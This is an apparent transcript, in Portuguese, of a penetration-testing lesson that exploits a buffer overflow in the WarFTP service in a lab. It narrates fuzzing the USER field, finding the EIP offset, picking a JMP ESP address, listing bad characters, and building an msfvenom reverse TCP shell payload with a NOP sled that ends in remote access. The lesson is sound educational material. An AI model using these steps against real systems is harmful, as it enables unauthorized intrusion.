Olá pessoal, nessa aula nós iremos continuar aí com a nossa exploração de Buffer Overflow, né? Na aula passada nós aprendemos todo esse processo desde da identificação da vulnerabilidade até a criação do exploit, né? Passo a passo. E nessa aula vai ser como um exercício de fixação, a gente vai explorar uma outra aplicação, um outro serviço, né? Na aula passada nós exploramos um serviço de e-mail e nessa aula nós iremos explorar um serviço de FTP, tá? Então, vamos lá. Vou estar utilizando o Kali aqui como ataque e aqui o Windows XP aqui com a aplicação WarFTP agora, que é a que a gente vai explorar, certo? Então, o primeiro passo, abrir o debugger e aqui abrir a aplicação. Pode vir em Open, selecionar onde ela está aqui na área de trabalho, warftpd.ez. Carregou aqui, vamos dar um play. E aí, nesse caso, a aplicação vai abrir aqui. Ela mostra o endereço de IP aqui, 192.168.0.109, a porta 21. E temos que clicar aqui no raiozinho aqui para fazer essa aplicação ficar online, ok? E agora já está aguardando conexões, certo? E aqui no nosso Kali nós iremos começar a criar, né? Eu poderia utilizar códigos da aula passada, né, para fazer o connect, para interagir diretamente com essa aplicação, mas como é um exercício de fixação, eu recomendo aí que vocês criem cada código aí do zero, como eu vou fazer aqui também. Isso serve para que você comece a assimilar, né, e isso vai entrando na sua memória, né? Então, de tanto você fazer, ficar escrevendo o connect, ficar escrevendo fuzzing, você vai acabar guardando isso em memória e aí você não esquece mais, ok? Então vamos lá. Vou criar aqui então o conecta, vou pôr o nome de conecta.py, que vai ser o que a gente vai utilizar para interagir com a aplicação. O srbin python. Vamos lá então, import socket. E agora eu vou criar o socket então. socket.afnet, socket.sockstring, s.connect, 192.168.0.109, que é o IP do servidor lá, né? E a porta 21. Aqui a gente pega os 1024 bytes, vamos colocar aqui como R, que é de resposta, e imprimir essa resposta na tela. Então, quando ele conectar, ele vai trazer o banner aí da conexão, tá? E após fazer isso, nós iremos enviar então um send aqui para interagir com esse serviço, tá? Então, é um serviço de FTP. O serviço de FTP geralmente ele aceita usuário e senha, né? Ele pede o usuário, depois pede a senha do FTP. Então, vamos enviar então user test, qualquer coisa, né? /r /n. Vamos pegar a resposta que ele vai responder desse usuário, imprimir isso também e vamos enviar a senha. Lembrando que a gente não sabe, né, nem usuário e nem senha desse serviço. Estamos fazendo um teste e ver como que a aplicação vai se comportar de acordo com o que a gente está fazendo aqui. Certo? Então, criei a conexão com a porta 21, capturei aí a resposta, enviei o usuário, capturei a resposta, enviei a senha, capturei a resposta. Beleza? Vamos fazer um teste então. Python conecta. Tá aqui. Então, ele pediu o usuário, por favor, entre com o usuário. A gente entrou, ele falou, o usuário é ok, precisa de uma senha. E aí, quando a gente passou a senha, ele respondeu, olha, a senha não aceita, fechando a conexão. Certo? Então, deixa eu ver se aqui ele mostra todo esse processo. Não mostrou. Aqui, mostrou sim, ó. O usuário teste do IP 192.168.0.108
teve uma conexão aqui recusada, tá? Porque ele não é um usuário válido, certo? Bom, uma vez que a gente já fez a conexão, nós vamos criar agora um fuzz, então. Vou pôr aqui fuzz ftp.py, beleza? USR em Python, import socket. E aí vamos fazer o seguinte, ó, buffer igual, vamos criar uma lista, um caractere A, criar um contador iniciando em 100, e aí eu vou criar um laço aqui, tá? Um laço enquanto o tamanho do buffer for menor ou igual a 25, que é a quantidade de vezes que ele vai executar esse laço, ele vai fazer o seguinte, buffer.append, que é para ele pegar esse caractere, vai fazer vezes contador, depois ele vai fazer o contador, vai incrementar o contador, é igual ao contador mais 200. Ou seja, a gente tem um caractere A e um contador iniciando em 100 aqui. Então a primeira vez que a gente executar, ele vai ter só o caractere A, ele vai enviar só um A. Depois ele vai fazer a primeira execução do laço aqui, então ele vai fazer A vezes contador, então o A passa a valer 100 As, né? Então a próxima vez que ele executar, ele vai enviar 100 As, e aí ele passa aqui pelo contador, e aí vai valer 200 As. E aí vai incrementar com 100, que ele já tem 300. Então de 200 em 200. Então 1 A, 100 As, 300 As, 500 As, e ele vai enviando essa quantidade de bytes para a aplicação, até a gente ver se a gente consegue travar essa aplicação, causar algum erro lá. Tá? E agora a gente vai utilizar o for aqui para pegar essa string, né? Na onde? Em buffer, certo? Podemos exibir alguma coisa na tela, né? Então fuzzing ftp user com a quantidade de bytes, tá? Então coloquei aqui para ele pegar essa variável aqui que vai ser a quantidade de bytes. Poderia colocar aqui simplesmente string, só que se eu fizer isso, ele vai ficar exibindo a quantidade de As na tela, né? Não a quantidade, mas vai ficar mostrando os As, né? Então tenho um A só ali e exibir que está fazendo o fuzzy com A bytes, depois A bytes. Então eu não quero isso, eu quero que ele mostre a quantidade. Então para ele mostrar a quantidade a gente utiliza o len, né, que é para ele mostrar o tamanho aqui. E aí nesse caso ele vai estar mostrando a quantidade de bytes que ele está enviando. Perfeito? E após isso a gente faz o nosso socket, então socket.socket socket.af inet socket.sock string s.connect 192.168.0.109 na porta 21. Opa! Beleza. Agora que a gente já fez a conexão, nós podemos então enviar dados, né, esses bytes para a aplicação. Então, eu vou utilizar o send aqui. A gente poderia estar utilizando, enviando esses bytes na hora de enviar o usuário ou na hora de enviar a senha, nesse caso aqui, ok? Então, podemos fazer o teste das duas formas, tá? Então, vamos fazer direto aqui pelo usuário. Mas caso o usuário não consiga, a gente não consiga travar a aplicação através do usuário, nós podemos passar um usuário qualquer e na hora de passar a senha, a gente passaria esses bytes, ok? Então aqui a gente coloca a nossa string, certo? Seguido aqui do /r/n, certo? Então vamos fazer um teste agora. Python fuzzftp. E ao executar, ele parou aqui em 1100 bytes, tá? E aqui na aplicação, basicamente a aplicação parou aqui, deu um access violation 41, 41, 41, 41, né, que são nossos As. O IP foi sobrescrito. O SP parece ter um pouco de A aqui no comecinho, tá? Então, basicamente, a gente conseguiu travar a aplicação, certo? O legal dessa aplicação aqui é que a gente não precisa ficar fechando o debugger toda hora. Nesse caso aqui a gente pode clicar aqui no Restart, sim, e aí ele já reinicia a aplicação.
podemos dar um play novamente e clicar no raiozinho aqui que ele já vai estar em execução novamente. Beleza, então a gente viu que se a gente enviar 1.100 bytes para essa aplicação, basicamente ela para de funcionar e a gente sobrescreve EIP, tá? Então, vamos voltar aqui no nosso conecta. E aqui vamos criar, então, podemos eliminar o final aqui do nosso conecta, essa parte aqui da senha que a gente nem vai enviar. E vamos criar aqui, então, um buff, tá? Vou pôr o nome de buff, que vai ser A vezes 1100, certo? É a quantidade de bytes que a gente vai estar enviando agora, então. E ao invés de enviar teste, agora a gente vai enviar, então, o nosso buff. Beleza? Então, esse aqui é o nosso crash, né? Só para a gente ver se a aplicação vai travar mesmo com 1.100 bytes e a gente vai sobrescrever IP. Só uma prova aí de conceito, só para a gente ver se está certo aí o que a gente identificou com o nosso fuzzy. Então, antes de executar, vamos só checar se está tudo certinho aqui, beleza? E vou executar então. Executou, hora de enviar o usuário, deu o usuário aqui, precisa de senha e tal, mas aqui ele sobrescreveu o EIP, certo? 41, 41, 41, 41. Olha que interessante, o ESP ele está cheio de A, um montão de A. O EBP também, um monte de A. O EDI também com um monte de A, tá? Então isso significa que nesse caso aqui nós poderíamos explorar essa aplicação através de vários registradores aqui, tá? Então apontando para ESP a gente consegue chegar em A, apontando para EBP a gente chega em A, apontando para EDI a gente chega em A, tá? Nos nossos A's aqui, perfeito? Então agora antes da gente preparar shellcode, essas coisas, nós precisamos descobrir exatamente onde que a gente está sobrescrevendo o EIP, certo? Então vou reiniciar novamente a aplicação, dar o play aqui, deixar em execução. E para a gente identificar exatamente onde está a aplicação, nós precisamos gerar um padrão, né? Poderia fazer daquela forma manual de ir diminuindo e enviando vários bytes, o que ia demorar muito tempo, mas é muito mais simples a gente utilizar aquela ferramenta que eu mostrei lá, que é o Pattern Create. Mais fácil a gente dar um locate Pattern Create aqui. Beleza, a ferramenta está nesse endereço aqui. Então vamos gerar um padrão que vai ter 1.100 bytes, certo? Vamos aguardar, gerou. Então agora, ao invés de a gente enviar o conecta com esses A's aqui, a gente vai enviar nosso padrão que a gente acabou de criar aqui. E tirar aqui os 1.100, porque o padrão já tem 1.100 bytes, correto? Então vamos fazer um teste agora, Python conecta. E tá aqui, ó. Ele gerou aqui, mais uma vez ele sobrescreveu o EIP, e agora o endereço aqui que ele pegou é diferente, ele tá tudo com o padrão que a gente gerou, certo? Então 32, 71, 41, 31, né? Agora a gente pode dar um locate pattern offset, ver onde está o endereço do pattern. Dá um clear aqui para limpar a tela. E aí nós iremos colocar o nosso endereço aqui, 32, 71, 41, 31, que é o endereço que chegou ao EIP. 32, 71, 41, 31. E ele sobrescreve EIP com 485 bytes. Isso é o que o pattern conseguiu identificar, tá? Então esse padrão que a gente gerou, quando você enviar 485 bytes, você atinge EIP, certo?
Então, para a gente validar isso, vamos pegar nosso conecta aqui. Vou até remover esse buffer, criar um novo. Buff vai ser o seguinte, A vezes 485, que é a quantidade que ele falou que chega no EIP, mais, e aí para a gente testar o nosso EIP tem que estar com B, tá? Então eu posso fazer B vezes 4, ou 4B, certo? Vou fazer vezes 4 aqui, mais, e aí eu vou enviar alguns Cs, que vai ser vezes, aí para mim não ficar fazendo soma aqui, eu faço 1.100 bytes, que foi o que eu enviei, menos 489, que é 485 mais 4 daqui, certo? Então, o que sobrar aqui ele envia de C, tá? Vamos fazer um teste aí. Python conecta. Antes de enviar, vamos reiniciar aqui a aplicação. Iniciar ela. Deixar em execução, perfeito. Pronto, enviamos. Ó, perfeito. Então, nós enviamos 485 A's com 4 B's para os B's chegarem ao EIP. E o EIP, então, teve os nossos B's, ó, que são 42, 42, 42, 42. Ou seja, a gente sobrescreveu o EIP com 42, com nossos B's, ou seja, a gente já tem controle exato do nosso EIP, certo? E em SP, né, nós temos os nossos Cs, tá? Que é o espaço onde a gente vai colocar o nosso shellcode, tá? Então nós podemos pular para ESP, para EBP, para EDI, tá? Basicamente, vamos para ESP, então, vai ser o nosso objetivo aqui. E aqui nós conseguimos ver exatamente, ó, então os A's que a gente está enviando, os 4 B's aqui que equivale ao nosso EIP, certo? E os nossos Cs aqui, perfeito? Vou reiniciar a aplicação de novo. Opa, dar um start aqui e deixar em execução. Beleza. Bom, vamos criar aqui então um resuminho aqui sobre o que a gente já fez até agora, né? Para a gente se organizar para estar criando o nosso exploit para essa aplicação. Então, basicamente, o primeiro passo foi a gente identificar com quantos bytes a aplicação causava o problema, né? Quantos bytes ela quebrava. Então, 1.100 bytes a aplicação quebra, certo? E 485 bytes mais 4, nós atingimos o EIP, certo? Então, 485 bytes mais 4 bytes, nós chegamos a EIP. E depois o que sobrar disso, que são cerca de 611 bytes, nós temos livres para poder colocar o nosso shellcode, tá? E nós vimos que esses bytes eles chegam em SP, em EDI, enfim. Então, nós podemos fazer um jump ESP para procurar o nosso endereço de retorno em jump ESP, tá? Mas antes da gente testar isso, nós precisamos enviar para a aplicação os nossos badge, os chamados badge caracteres, né? Então, os caracteres inválidos, quais caracteres que essa aplicação não aceita, tá? Então, você pode fazer isso, como eu mostrei na última aula, enviando essa tabelinha aqui de badge caracteres, tá? E vendo como a aplicação vai se comportar. Então, para a gente não ficar perdendo tempo, existem alguns caracteres que a gente já pode eliminar de cara, como por exemplo, deixa eu colocar alguns aqui. Em todo o shellcode que a gente criar, a gente pode sempre eliminar eles, e caso não funcione a aplicação, aí a gente vai e faz esse teste, ok? Então, por exemplo, 00, que é o null byte, 0D, o 0A, o 20, que é o espaço, nesse caso aqui, em específico, o 40, que é o arroba, tá? O FTP não aceita o arroba também. Então, basicamente, esses são os caracteres inválidos, tá? Então, você sempre, quando for criar um shellcode, pode eliminar esses caracteres, tá? E aí, mesmo assim, se seu shellcode não funcionar, estiver dando algum problema, aí você pode
começar a enviar essa tabela, eliminando os caracteres e testando como eu mostrei na aula passada, ok? Então vamos lá. Voltando aqui para a aplicação, nós precisamos então identificar o endereço de retorno, né? Precisamos de algo que leve a gente ao jump ESP, ok? Então para isso nós podemos vir aqui no E e procurar aqui dentro de alguma dessas DLLs um jump ESP. Então nós podemos clicar em qualquer uma aqui, vou pegar uma do Windows aqui, por exemplo, Shell 32. Clicar com o direito, View Code em CPU, ele vai vir para essa tela aqui, clica com o direito aqui também, Search for Command, e aí você coloca o que você está procurando. Estou procurando um jump ESP, que é para onde eu quero pular. Dou um find aqui, e aí ele traz aqui que ele tem um jump ESP nesse endereço, ó. 7C, 9D, 30, D7. Nós podemos continuar descendo o código aqui e ver se tem outro FFE4, ó, ou um jump ESP, que é a mesma coisa. Tem outro endereço aqui, ó, 7C, 9D, 31, 3B. Podemos continuar descendo e procurando mais jump ESP, tá? Outra forma da gente fazer isso é através do Mona, né? Lembra que a gente pode fazer essa pesquisa aqui, Mona módulos. Ele mostra os módulos que ele tem aqui. Podemos escolher algum desses módulos aqui, por exemplo, kernel 32 aqui. Vamos pesquisar nele. E aí a gente faz Mona find -s, coloca o que a gente quer pesquisar, só que aí tem que estar em opcode, então FFE4, como a gente viu lá, -m, kernel 32.dll. Ele não encontrou. Vamos fazer o mesmo teste aqui, então, que ele encontrou lá no Shell 32. Só para ver. Ó, em Shell 32 ele encontrou vários endereços, tá? Então nós podemos utilizar algum desses endereços. Aí aqui poderia clicar com o direito, dump patch address, aumentar a tela aqui, clica com o direito, disassembly, e a gente vê que tem um jump ESP aqui, tá? Poderia usar este endereço para fazer o jump ESP como endereço de retorno, tá? Mas vamos usar esse aqui dessa forma aqui. Você pode escolher uma dessas duas formas, tá? Então, se você não conseguir encontrar para onde você quer ir de uma forma, você procura de outra, ok? Então, View Code em CPU. Vou vir aqui novamente, Command Jump ESP. Procurar aqui, posso usar esse Jump ESP, posso usar esse, posso usar esse. Então, vou escolher esse aqui, por exemplo, ó. 7C, 9D, 31, 3B. Vamos anotar ele aqui, então, no nosso resumo. Jump ESP vai ser 7C 9D, 7C 9D, 31 3B. 31 3B. É isso mesmo, né? Deixa eu só confirmar aqui. Beleza. Então, antes da gente fazer o teste, vamos clicar aqui com o direito em cima dele, colocar breaking point e definir um breakpoint memory on access nele, tá? Então a gente acabou de definir um breakpoint nesse endereço aí. Vou colocar aqui meu programinha e vamos fazer um teste então. Deixar essa tela aqui de lado, lembrando que nós precisamos colocar isso de forma inversa, tá? Então no nosso código ele vai ser 3B 31 9D 7C, ok? Então, vamos agora para o nosso Conecta e vamos fazer um teste aí, ver se a gente consegue controlar o IP, colocar esse endereço de retorno aí e cair lá onde estão os nossos Cs, ok? Então, vamos lá então. Nano Conecta. E aqui onde estão os nossos Bs, ao invés de eu mandar o B 4 vezes, eu vou mandar o nosso endereço que a gente encontrou de retorno, tá? Então, ele vai ficar 3B 31 9D
7C, certo? E depois disso, ele vai enviar os nossos Cs aqui com o que sobrar, ok? Vou fechar aqui. Vamos fazer um teste. Python conecta. Enviamos. Vamos ver o que aconteceu lá. Beleza, ó. Como nós podemos ver, ele parou aqui no breaking point do shell 32 aqui, .dll, que é onde a gente definiu esse breakpoint, é o nosso endereço de retorno. Vamos agora fazer um F7 aqui. Vou dar um F7. Aqui. Então, a hora que a gente aperta o F7, a gente cai aqui para os nossos Cs, tá? Porque ele fez um jump ESP, ou seja, ele pulou aqui para o ESP, tá? Ou seja, a gente controlou a execução desse programa. Então, uma vez que agora a gente tem o controle sobre o EIP, a gente já tem um endereço de retorno, já consegue chegar até ESP, agora a gente precisa gerar o nosso shellcode para colocar ele aqui onde está os nossos Cs, tá? Então, vou reiniciar novamente aqui. Deixar online. Criar nosso shellcode agora. Vamos utilizar o MSF Venom. "-p. No caso aqui, o Windows Shell. Vou criar uma conexão reverse. Então, reverse TCP. O lhost, que é onde ele vai conectar. Então, 92.168.108. Que é o IP do meu Kali. O lport, que é a porta, no caso é 443. Vou colocar aqui o "-b" para colocar os bad characters. Então vai ser o 00, o 0A, o 0D, o 20 e o 40. E o "-f" aqui, que é a saída, para ele sair no formato do Python. Criou o shellcode, vamos copiar aqui. Copy. E ver o tamanho dele aqui, que foi 351 bytes, certo? E agora, antes da gente colocar já direto no conecta, vamos copiar esse conecta com o nome de exploit ftp.py. E eu vou editar o exploit ftp aqui. Beleza? Então, aqui é onde ele está enviando os Cs, né? Então, nós podemos fazer o seguinte. Primeira coisa, como o nome do shellcode ficou como buff, vou mudar isso aqui para buffer. Certo? E aqui buffer. Certo? E aqui em cima a gente coloca o nosso shellcode. Beleza? Que tem o nome de buff. E agora, no lugar onde está o Cs aqui, a gente coloca o nosso buff. Só que aí tem um detalhe. Se a gente colocar ele diretamente aqui, ó, nós precisamos ver essa questão do espaço. Tá? Então, nós temos aqui, vou abrir o Python aqui. Nós temos, deixa eu aumentar a tela um pouquinho, 1100 menos 489. Temos 611 bytes, tá? Então, antes de enviar o buffer, vamos enviar os NOP, né, que é para a gente fazer o NOP SLED, que o NOP é No Operation, então ele vai colocar uns NOPs antes do nosso shellcode, tá? Então, quanto a gente tem que colocar de NOP? Então, a gente pode fazer 611, né, menos aqui o 351. Vai dar 260 bytes aí de NOPs. Então, o NOP aqui é representado pelo /x90. Então, nós poderíamos fazer dessa forma aqui, 260. Certo? Ou a gente pode meio que automatizar aqui, ó. Fazer x90 menos 1100 menos 489 menos o tamanho do buff, certo? Ou seja, ele já vai se encarregar de ler, de contar aqui o tamanho que o nosso shellcode tem. No caso aqui, 351. Então, ele vai fazer 1100 menos 489, que equivale a isso aqui, certo? De bytes.
e aí sobraria 611. Só que aí ele vai e vê o tamanho disso aqui, que é o land buff, que é 351. Então ele sabe que ele tem que tirar isso e vai sobrar 260 bytes para NOP, tá? Então deixa eu pôr aqui. Mais o buff, ok? Que aí depois vai sobrar exatamente 351 bytes e aí sim a gente envia o nosso buff, que é o nosso shellcode, ok? Vou finalizar aqui, fechar, salvar. E aqui onde está esse terminal aqui, vamos fazer um teste. Vou abrir uma porta aqui na minha máquina. 443. L aqui, né, de listen. Deixar ele escutando. E aqui mais embaixo a gente vai executar o nosso exploit. Mas antes da gente executar o exploit, vamos voltar aqui na aplicação. Opa, deixa eu abrir ela aqui de novo. Vamos definir o breaking point lá no endereço onde a gente encontrou. Na verdade, a gente pode fazer o breakpoint de uma outra forma também, tá? Eu mostrei a gente fazendo memory on access, mas nós poderíamos simplesmente pegar aqui D e colocar o endereço que a gente encontrou lá. Deixa eu ver se eu tenho ele salvo. Não tenho ele salvo. Vamos ver qual que é aqui. Esse aqui, ó, 7C, 9D, 31, 3B. Aí aqui a gente não coloca invertido porque o debugger já sabe. Então, 7C, 9D, 31, 3B. 31, 3B. Certo? Então, com isso, a gente define também um breaking point. Tá? Então, são duas formas que a gente pode utilizar para definir um breaking point. Beleza. Vamos fazer um teste, então. Vamos executar nosso exploit e ver como que vai funcionar. Executamos. Parou no breaking point, perfeito. Uma vez que ele parou no breakpoint, vamos dar um F7. Beleza, ó, ele veio para os NOPs. Então agora a gente vai fazendo F7, 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 F7 várias vezes. Ele vai percorrer aqui 260 NOPs, foi o que ele mandou de NOP. Deixa eu já ir lá para o final. E depois que ele passar esses 200 e poucos NOPs aí, ele chega aqui no nosso shellcode, tá? Então, agora que a gente já viu que o fluxo está funcionando, vamos então fechar a aplicação aqui. Abrir ela sem ser no debugger, como se fosse um teste, um ataque mesmo, né? E agora, deixa escutando aqui a porta 443, onde a gente vai receber a conexão. E aqui a gente executa novamente o nosso exploit. E tá aí, ó. Ao executar o exploit, a gente ganhou acesso à máquina-alvo, tá? A aplicação aqui, ela mostra tudo que recebeu aqui nos logs, tudo, tá? Mas o importante é que nós conseguimos acesso a esse computador explorando o buffer overflow desse serviço, ok? Então, essa aula, ela ficou uma aula um pouco mais comprida, não foi dividida em etapas, justamente para que você use ela como exemplo, tá? Então, a ideia é que você replique todos os exemplos que eu estou mostrando aqui e essa aula fica como uma fixação, tá? Então, não fique aproveitando o código, reescreva o código tudo do zero para que você consiga fixar todo esse processo, ok? E nas próximas aulas nós iremos ver outros métodos de ataque para buffer overflow, ok? Até mais, pessoal!